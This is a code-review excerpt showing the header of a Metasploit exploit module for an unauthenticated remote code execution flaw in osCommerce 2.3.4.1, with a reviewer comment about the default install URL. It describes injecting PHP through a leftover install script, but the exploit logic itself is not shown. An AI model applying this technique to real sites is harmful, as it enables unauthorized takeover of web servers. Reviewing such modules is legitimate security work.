modules/exploits/multi/http/osCommerce.rb

```diff
@@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'osCommerce 2.3.4.1 - Remote Code Execution',
+      'Description'    => %q{
+         If the /install/ directory was not removed, it is possible for an unauthenticated
+         attacker to run the "install_4.php" script, which will create the configuration
+         file for the installation. This allows the attacker to inject PHP code into the
+         configuration file and execute it.
+      },
+      'Author'         => [
+        'Simon Scannell',      # Original exploit author
+        'Daniel Teixeira'      # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '44374'],
+        ],
+        'Payload'      =>
+        {
+          'BadChars' => "\x00",
+        },
+       'Privileged' => false,
+       'Platform'   => ['php'],
+       'Arch'       => ARCH_PHP,
+       'Targets' =>
+            [
+                [ 'osCommerce 2.3.4.1', { } ],
+            ],
+      'DisclosureDate' => 'Apr 30 2018',
+      'DefaultTarget' => 0))
+     register_options(
+    [
+      OptString.new('INSTALLURL', [true, 'The path to the install file', '/catalog/install/install.php?step=4']),
```

Comment:
The user probably shouldn't have to specify the query string `?step=4`.

This can be hard coded later in the module.